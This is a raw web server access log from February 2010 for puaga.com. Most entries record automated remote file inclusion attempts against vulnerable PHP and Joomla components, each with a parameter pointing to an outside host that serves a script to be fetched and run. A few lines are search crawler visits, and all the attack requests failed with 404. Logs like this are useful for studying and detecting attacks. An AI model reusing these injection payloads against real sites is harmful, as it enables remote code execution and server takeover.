58.230.162.220 - - [25/Feb/2010:08:47:32 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.98.223.162 - - [25/Feb/2010:08:48:59 -0800] "GET /logs/access_100219.log//bbs///write_update.php/?board_skin_path=http://raimu.wen.ru/safe.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:50:09 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:50:09 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:50:09 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:50:13 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:50:13 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:50:13 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:51:13 -0800] "GET /include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:51:13 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:51:13 -0800] "GET /logs//include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:51:17 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:51:17 -0800] "GET /logs//include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:51:18 -0800] "GET /include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:51:40 -0800] "GET /logs//include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:51:40 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:51:40 -0800] "GET /include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:52:06 -0800] "GET /logs//include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:52:06 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:52:06 -0800] "GET /include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:52:39 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:52:59 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:53:05 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:53:05 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:53:06 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:53:07 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:53:07 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:53:07 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:53:08 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:53:08 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:53:11 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:53:54 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:53:54 -0800] "GET /logs/access_100217.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:53:58 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:54:09 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:54:09 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:54:10 -0800] "GET /logs/access_100119.log%20%20//include/lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:54:17 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:54:24 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:54:24 -0800] "GET /logs/access_100217.log%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:54:24 -0800] "GET /logs/access_100217.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:54:27 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:54:29 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:08:54:41 -0800] "GET /include/write.php?dir=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:08:54:41 -0800] "GET /logs/access_100207.log//include/write.php?dir=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:08:54:41 -0800] "GET /logs//include/write.php?dir=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:08:54:41 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.115.151 - - [25/Feb/2010:08:54:48 -0800] "GET /module/setup.php HTTP/1.0" 200 1704 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
200.93.147.154 - - [25/Feb/2010:08:55:04 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:55:05 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:55:05 -0800] "GET /logs/access_100217.log%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:56:20 -0800] "GET /logs////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:56:25 -0800] "GET ///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:56:35 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:56:38 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:56:53 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:57:07 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:57:07 -0800] "GET /logs/access_100217.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:57:13 -0800] "GET /logs/access_100217.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:57:15 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:57:16 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:57:23 -0800] "GET /logs/access_100212.log%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:57:40 -0800] "GET /logs/access_100212.log%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:57:40 -0800] "GET /logs/access_100207.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:58:16 -0800] "GET ///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:58:16 -0800] "GET /logs/access_100211.log////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:58:16 -0800] "GET /logs////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:08:59:49 -0800] "GET /logs/access_100123.log%20%20////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.163.50 - - [25/Feb/2010:09:00:16 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
174.129.163.50 - - [25/Feb/2010:09:00:16 -0800] "GET /ideal/forum/viewtopic.php?p=27335 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
200.93.147.154 - - [25/Feb/2010:09:04:05 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:05:34 -0800] "GET /logs/access_100211.log%20%20////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:07:08 -0800] "GET /logs/access_100211.log%20%20////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:07:20 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:07:21 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
67.195.115.151 - - [25/Feb/2010:09:07:38 -0800] "GET /login/ HTTP/1.0" 200 6675 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.115.151 - - [25/Feb/2010:09:07:40 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/login/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.115.151 - - [25/Feb/2010:09:07:43 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/login/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
78.188.102.171 - - [25/Feb/2010:09:07:43 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:07:43 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:07:53 -0800] "GET /logs/access_100123.log////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:07:59 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:07:59 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:08:08 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:08:09 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:08:17 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:08:17 -0800] "GET /logs/access_100219.log//modules/vwar/admin/admin.php?vwar_root=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:08:17 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:08:17 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:08:18 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:08:21 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:08:21 -0800] "GET /logs/access_100219.log//modules/vwar/admin/admin.php?vwar_root=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:08:21 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:08:51 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:08:51 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:08:51 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:09:08:51 -0800] "GET /logs/access_100123.log////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:08:54 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:08:55 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.0" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:09:02 -0800] "GET /logs/access_100129.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:09:02 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:09:02 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:09:10 -0800] "GET /logs/access_100206.log%20%20//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.98.223.162 - - [25/Feb/2010:09:09:21 -0800] "GET /logs/access_100130.log//comment_modify.php?dir=http://raimu.wen.ru/safe.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
118.98.223.162 - - [25/Feb/2010:09:09:22 -0800] "GET /logs//comment_modify.php?dir=http://raimu.wen.ru/safe.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:09:26 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:09:26 -0800] "GET /logs/access_100129.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:09:26 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:09:37 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:09:37 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:09:37 -0800] "GET /logs/access_100203.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:09:46 -0800] "GET /logs/access_100213.log//modules/vwar/admin/admin.php?vwar_root=http://smadi.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:10:04 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:10:04 -0800] "GET /logs/access_100203.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:10:04 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:10:04 -0800] "GET /logs/access_100206.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:11:53 -0800] "GET /errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
